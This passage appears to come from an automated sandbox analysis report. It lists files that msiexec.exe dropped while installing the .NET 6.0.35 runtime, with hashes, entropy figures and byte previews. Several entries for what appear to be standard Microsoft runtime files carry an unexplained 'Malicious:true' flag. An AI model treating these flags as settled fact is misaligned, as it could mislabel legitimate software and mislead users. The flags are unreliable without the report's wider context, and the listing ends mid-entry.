                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\LICENSE.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (514), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):9519
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.902271147017698
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:ydP0KvBLCqikR/EgGJLrlwD+eilNi5Py1SDeoDXDw9lF5OMz6Q:PWBuqikR/EDJLriwlNi5KI1Tw9lF5OjQ
                                                                                                                                                                                                                                                                                                                                  MD5:31C5A77B3C57C8C2E82B9541B00BCD5A
                                                                                                                                                                                                                                                                                                                                  SHA1:153D4BC14E3A2C1485006F1752E797CA8684D06D
                                                                                                                                                                                                                                                                                                                                  SHA-256:7F6839A61CE892B79C6549E2DC5A81FDBD240A0B260F8881216B45B7FDA8B45D
                                                                                                                                                                                                                                                                                                                                  SHA-512:AD33E3C0C3B060AD44C5B1B712C991B2D7042F6A60DC691C014D977C922A7E3A783BA9BADE1A34DE853C271FDE1FB75BC2C47869ACD863A40BE3A6C6D754C0A6
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MICROSOFT SOFTWARE LICENSE TERMS..MICROSOFT .NET LIBRARY ..These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft.. * updates,.. * supplements,.. * Internet-based services, and.. * support services..for this software, unless other terms accompany those items. If so, those terms apply...BY USING THE SOFTWARE, YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM, DO NOT USE THE SOFTWARE...IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE PERPETUAL RIGHTS BELOW...1. INSTALLATION AND USE RIGHTS. .. a. Installation and Use. You may install and use any number of copies of the software to design, develop and test your programs... b. Third Party Programs. The software may include third party programs that Microsoft, not the third party, licenses to you under this

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\ThirdPartyNotices.txt

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (755), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):79954
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2343129347468
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:HA9jHwQZGfgg39/zwgAVkguQXrDjugtSEGepkWvrpX7anuqdLS4mfiStPq+3Lefj:HA97wfogz1AVxuujHtSFULryLggrGRwJ
                                                                                                                                                                                                                                                                                                                                  MD5:F77A4AECFAF4640D801EB6DCDFDDC478
                                                                                                                                                                                                                                                                                                                                  SHA1:7424710F255F6205EF559E4D7E281A3B701183BB
                                                                                                                                                                                                                                                                                                                                  SHA-256:D5DB0ED54363E40717AE09E746DEC99AD5B09223CC1273BB870703176DD226B7
                                                                                                                                                                                                                                                                                                                                  SHA-512:1B729DFA561899980BA8B15128EA39BC1E609FE07B30B283001FD9CF9DA62885D78C18082D0085EDD81F09203F878549B48F7F888A8486A2A526B134C849FD6B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.NET Runtime uses third-party libraries or other resources that may be..distributed under licenses different than the .NET Runtime software.....In the event that we accidentally failed to list a required notice, please..bring it to our attention. Post an issue or email us:.... dotnet@microsoft.com....The attached notices are provided for information only.....License notice for ASP.NET..-------------------------------....Copyright (c) .NET Foundation. All rights reserved...Licensed under the Apache License, Version 2.0.....Available at..https://github.com/dotnet/aspnetcore/blob/main/LICENSE.txt....License notice for Slicing-by-8..-------------------------------....http://sourceforge.net/projects/slicing-by-8/....Copyright (c) 2004-2006 Intel Corporation - All Rights Reserved......This software program is licensed subject to the BSD License, available at..http://www.opensource.org/licenses/bsd-license.html.....License notice for Unicode data..-------------------------------...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\dotnet.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):139560
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.287749729909957
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3072:swmRQoZmiyYIRPEgufW6see/URLSpseL5AXboB0UD:swmRbZmiyAfClcRLSpfLyLu0g
                                                                                                                                                                                                                                                                                                                                  MD5:36D228BE5ED20ADCC78CE322462BB51F
                                                                                                                                                                                                                                                                                                                                  SHA1:075B139595D5A86D53F87E2C90F0E484C9A769C0
                                                                                                                                                                                                                                                                                                                                  SHA-256:9935A604779C42CC7FC4291A68EC1D6EE889B8CEC349630B1ED1EFEC0B79B1BE
                                                                                                                                                                                                                                                                                                                                  SHA-512:419744B62337B1DBAD22FC3D1238FE2CC2DD7CABFBAD79F14E05CE6C470189D8F0DA8E6C9C97AA6E86AFD8398BAA9B90DFDA0A295D61A2F7413A7ADC704B9A27
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..}|...|...|...../p...../v.....//...u.).l...../y...|........./t.....E.}...../}...Rich|...................PE..d......f.........."......J.......... ..........@.............................P.......p....`..........................................................0..........8.......()...@..........T.......................(.......8............`...............................text....H.......J.................. ..`.rdata...~...`.......N..............@..@.data...............................@....pdata..8...........................@..@_RDATA....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\host\fxr\6.0.35\hostfxr.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):378016
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.299291222115666
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:oGrRuLv2A7NEtiODC3zGr4iAOsCSEAg2gcmgrW091s:vOv2aNEzDuiAOsUuH91s
                                                                                                                                                                                                                                                                                                                                  MD5:940CD13B0268A9F75DD1C04548BBB9A9
                                                                                                                                                                                                                                                                                                                                  SHA1:7EBCE93D389C04DF1E3FCE71C9659DF6D75749B5
                                                                                                                                                                                                                                                                                                                                  SHA-256:36D60BF2659400EA672EDEC58C7FA1105B8F7BF55E75A75C7554ECDEFF1DBD89
                                                                                                                                                                                                                                                                                                                                  SHA-512:37A9384067DA8F9FE345519455D1E9B125E8EB8B7B1E87F8B8DDFDB1070E5556B6A65084A32F56FDF9D4553A986F4575691859C71882445506650D947859B1B2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k..|.I.|.I.|.I...H.|.I...H.|.I...H.|.I...I.|.I+..H.|.I.|.I4|.I2..H.|.I2..H.|.I2..I.|.I2..H.|.IRich.|.I........PE..d......f.........." ................................................................pD....`A.........................................P.......R.................../.......(......|.......p.......................(.......8............................................text...,........................... ..`.rdata...S.......T..................@..@.data...(....p.......T..............@....pdata.../.......0...^..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\.version

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):50
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.951272380112911
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:ilQC7BRFSRHLgQbLi:w7BTiBbLi
                                                                                                                                                                                                                                                                                                                                  MD5:BB568E3396EAB3BC8E5B4084D3288C15
                                                                                                                                                                                                                                                                                                                                  SHA1:0C06BC1D72CF0706B7A901F4570A73E4CD151172
                                                                                                                                                                                                                                                                                                                                  SHA-256:B648A485B2762EA04CDCFB1C4631F0A75929D1ED8B7C1DF4BB139F0201662643
                                                                                                                                                                                                                                                                                                                                  SHA-512:42B379CB8596E258393948B5394FC5840DB3D9B76BEAAACD1BFBFE6C860C3835596BCBD4B31CDFF444A9AFEF46EE617BFD830AE46F08C974186A47DA2ED43272
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:b357f86ce3bce7c232ea242074b17bebdc50b543..6.0.35..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.CSharp.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1042720
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.759185121370171
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:a93g4kD8aA+u1xjx1nu+Vu9yHZzsYghdi4YNLNlqx:W3g4kDiLlVu+Vu9yH+XiFi
                                                                                                                                                                                                                                                                                                                                  MD5:C3928A25CD29B21B84DF1554B4EA3FEE
                                                                                                                                                                                                                                                                                                                                  SHA1:057F67EB18BC2B19CB77AC413141DE255DBD0211
                                                                                                                                                                                                                                                                                                                                  SHA-256:79E9D346314609D493344EA0C51AE8E93DEAA5870A105FC07EB29E8458748CBE
                                                                                                                                                                                                                                                                                                                                  SHA-512:825FD54D970A7B02C7863C45B574CBF3D51B0CFA33B51681B8D96D5D32771A4EF24EBCE5C57AFF664AB7231279A60871C8967745F87A9698347E4A66E0DB3EAC
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d... ............." ................................................................y.....`...@......@............... .......................................6...j...... )......<...`D..T...............................................................H............text............................... ..`.data...D...........................@....reloc..<...........................@..B............................................0.............................4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.DiaSymReader.Native.amd64.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):2309152
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.414576855139372
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:jH+fGgFyzuNiG6H0n8D1gkrz/OAyFAopdrq/c/:+GgFQq8DT/ZyFDN0c
                                                                                                                                                                                                                                                                                                                                  MD5:A71CD05C01F0FC603C0BD782516F806D
                                                                                                                                                                                                                                                                                                                                  SHA1:C15E261D5E7318875D324D28AB70A883CD434C81
                                                                                                                                                                                                                                                                                                                                  SHA-256:7F8DCF37D9D66EAE14C48A79FA2FCD447BD0F38A21BE0203A9C4A89398AACF28
                                                                                                                                                                                                                                                                                                                                  SHA-512:CE53F6DC1F02889ED6FB1F8DF226F9BADBB039F79505CDBD599A00A32B6617DA5E19F2AD7F76BB8134B3CCAD39FAB2209ED8EC6AE42CD30402C4E450FC19FA88
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Wq0...^...^...^.Xh]...^.Xh[..^.XhZ...^..]...^..Z.'.^.Xh_...^..._...^..[.m.^..W...^..^...^......^.......^..\...^.Rich..^.........................PE..d....ZY..........." ...(.....\...... 0........................................#......)$...`A.........................................Z!.p....[!.P....P#.......!..W....#. (...`#..>.....p.......................(....U..@...................0Y!.`....................text............................... ..`.rdata...Y.......Z..................@..@.data....a...p!......^!.............@....pdata...W....!..X...t!.............@..@.didat..p....@#.......".............@....rsrc........P#.......".............@..@.reloc...>...`#..@....".............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.deps.json

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):32962
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.336195794839597
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:+BP5VEsIhKPMEPrT3XCGjDyiEc6BHa21Fe8kFN92uwtEeCJyK:6RVEsIhKPMEPrT3XCGjDyiEc6BHa21Fk
                                                                                                                                                                                                                                                                                                                                  MD5:4D015F352BB2E8413AC4215371BC5E35
                                                                                                                                                                                                                                                                                                                                  SHA1:ADFF306655001DCD02003372C2AC439A7BE17C59
                                                                                                                                                                                                                                                                                                                                  SHA-256:686481AE0DD4F3F7E44B2A4FA2949B319A0F701437CA42FDA78D637EBC2BD298
                                                                                                                                                                                                                                                                                                                                  SHA-512:DA871BA710634EF171A80ACD1A473BEB8204E8DF10F375CB999B9FF1A95264C256D5C7E01531F62E8D4A2608BBB858A7C6209DCBE2348E360C7F231861D3CF5C
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeTarget": {.. "name": ".NETCoreApp,Version=v6.0/win-x64",.. "signature": "".. },.. "compilationOptions": {},.. "targets": {.. ".NETCoreApp,Version=v6.0": {},.. ".NETCoreApp,Version=v6.0/win-x64": {.. "Microsoft.NETCore.App.Runtime.win-x64/6.0.35": {.. "runtime": {.. "System.Private.CoreLib.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "Microsoft.VisualBasic.dll": {.. "assemblyVersion": "10.0.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "mscorlib.dll": {.. "assemblyVersion": "4.0.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "netstandard.dll": {.. "assemblyVersion": "2.1.0.0",.. "fileVersion": "6.0.3524.45918".. },.. "System.AppContext.dll": {.. "assemblyVersion": "6.0.0.0",.. "fileVersion": "6.0.3524.45918".. },..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.NETCore.App.runtimeconfig.json

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):159
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.54941695087313
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:3Hpn/hdNxDI/pANC+KL4nNOcW3mJAGRM3Bojqy2VKXmHEk/FTy:3Hp/hdNyhAk+Q6NOCUo+K8EkNTy
                                                                                                                                                                                                                                                                                                                                  MD5:3FBD84A952D4BAB02E11FEC7B2BBC90E
                                                                                                                                                                                                                                                                                                                                  SHA1:E92DE794F3C8D5A5A1A0B75318BE9D5FB528D07D
                                                                                                                                                                                                                                                                                                                                  SHA-256:1B7AA545D9D3216979A9EFE8D72967F6E559A9C6A22288D14444D6C5C4C15738
                                                                                                                                                                                                                                                                                                                                  SHA-512:C97C1DA7AE94847D4EDF11625DC5B5085838C3842A550310CCA5C70BA54BE907FF454CA1E0080BA451EACFC5954C3F778F8B4E26C0933E55C121C86C9A24400B
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:{.. "runtimeOptions": {.. "tfm": "net6.0",.. "configProperties": {.. "System.Reflection.Metadata.MetadataUpdater.IsSupported": false.. }.. }..}

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.Core.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1245448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.769261315323123
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:cxvknPxKYMVXllgnURGXuYl9wCi1Io+bZr:MvaPxKYcX8nURGX0CiY
                                                                                                                                                                                                                                                                                                                                  MD5:97F73DE2693B5F6EF780513E9179DDCF
                                                                                                                                                                                                                                                                                                                                  SHA1:EC998FAE441D1761960E1A1937EEADF60AE2ACC0
                                                                                                                                                                                                                                                                                                                                  SHA-256:92F5BAC23616A987292E4D65AABC8F16D102BAF50C1785A41C38305BC99A20B7
                                                                                                                                                                                                                                                                                                                                  SHA-512:98CE22DC95F50DA11F9828C9777DEF21AAB1EF95FAC938388766E2989C134F72896C7C8E1F686CF45077096879CFFD277CF94A7DBCECA238FD9BA0169DE8A14D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...a`............" ......................................................................`...@......@............... ..................................L........k.......)......l...(D..T...........................................................P...H............text............................... ..`.data........ ......................@....reloc..l...........................@..B............................................0.......................<.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............d...^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........R.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.VisualBasic.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18184
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.587142355138018
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:p9SphH3cLeq/YxWmH6K9QdWoYA6VFHRN7hYcTR9z67V:pkHMLH/oEFClbV9zMV
                                                                                                                                                                                                                                                                                                                                  MD5:E807A9DF3752B47DD2EBF325488329EB
                                                                                                                                                                                                                                                                                                                                  SHA1:D780B123892ED5343BD2F0741184AE2F90A0A3A7
                                                                                                                                                                                                                                                                                                                                  SHA-256:BB902FB88A2C3AFD4548AA7631E6CEFFB9A8062A213B9654DE40D7C2ACB2A985
                                                                                                                                                                                                                                                                                                                                  SHA-512:6CB85784EA617D879BC5C40D204A91092F233A492C2EEA642E56ABDEA671066E5D0ABF29FBF1C074DFEBBE1683FBBE0A632F20952DBE82B0557EA40BE89B469A
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....z..........." ..0..............2... ...@....... ....................................`.................................{2..O....@...................)...`.......1..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H.......P .......................1......................................BSJB............v4.0.30319......l.......#~..p.......#Strings....l.......#US.p.......#GUID.......H...#Blob............T.........3....................................K...............2.................<.....d.J..........."...~."....."...}."....."...}."....."...d.".....".....x.....x.............................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.....y......... .............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):26376
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.566822188548986
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:TWhPTpWvZWnjmMDQnqyXhHuo0XWjYA6VFHRN7KW+ONSR9zdVHJ3:eVjm5n5XdCIFCl7BNe9zh3
                                                                                                                                                                                                                                                                                                                                  MD5:1F61CBDDE703B882F07EF7D71C3D3D25
                                                                                                                                                                                                                                                                                                                                  SHA1:F09B9EC89343C7EBACCA3C956859F46A30BCE04D
                                                                                                                                                                                                                                                                                                                                  SHA-256:B64A75F89C611F4CF88EC9AE85BB34D719578B01C106B16E2E8703694ABD1B0C
                                                                                                                                                                                                                                                                                                                                  SHA-512:78A90230E462F2AFE911E88E974FA7976D957DEFD3FF04C9B141D970AE25F29BE3F70C1D4ACFEE43C319FA80A142663B66EC3CE073EDB8AC99616720CDD0BB96
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...i............." .....4...................................................p............`...@......@............... ..................................D............>...)...`..\...8...T...........................................................H...H............text....2.......4.................. ..`.data........P.......6..............@....reloc..\....`.......<..............@..B............................................0.......................4.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........L.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...(.....0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\Microsoft.Win32.Registry.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):87824
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.609888713325627
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:61Qcxml5haPYOueQFjym3sykEomWxGsVico5Bkbxliw33zC:61QIml5wPY3Fjy5ykE8xGsVicCBsXp3O
                                                                                                                                                                                                                                                                                                                                  MD5:EA5EF3E9C8F7A2A240ADB2D2D225AC01
                                                                                                                                                                                                                                                                                                                                  SHA1:EF69C741CF3CE92CC5B68E825C9E9796BAA9246B
                                                                                                                                                                                                                                                                                                                                  SHA-256:8609E30FBDE9BFE93B51A31E27963C44195EAC284904F5EA19E435E81CC9293D
                                                                                                                                                                                                                                                                                                                                  SHA-512:98C6B84FCB38F35E281265B7DD046A1CDFC1A31F787A011FE8227478C7D7C38AEBB09D350BAD457A115555BE28B7A6FD78659AC5A26AAF8A5B7970C25B19260D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....p..........." .........................................................`............`...@......@............... ..................................8...p............)...P..........T...........................................................8...H............text............................... ..`.data........0......................@....reloc.......P.......,..............@..B............................................0.......................(.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.................^.........#.?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........@.....S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....d...C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.35\System.AppContext.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15624
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.801530918765
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:W2NrDaW+p7WMYA6VFHRN7+eASR9zdVCOkh:nQbFClSe9za5
                                                                                                                                                                                                                                                                                                                                  MD5:23D709F84FAE16898B3B3FB532E39B92
                                                                                                                                                                                                                                                                                                                                  SHA1:34D3D72D6B1A2F0842DC18332585C60707CF29C2
                                                                                                                                                                                                                                                                                                                                  SHA-256:FBCB30E92AF2A28FC42F5862BBAC27A938B1A3BBDD21523DE48E5FC693AF720A
                                                                                                                                                                                                                                                                                                                                  SHA-512:0AAA8A9E4C2A7D7E287A1EC76F637BE582670E55823D42E179EDE70405BB60A58664F90CE2F39E1A5E136010E428E19DBBC38F61E7753F95CA5EDEB2FB5E883C
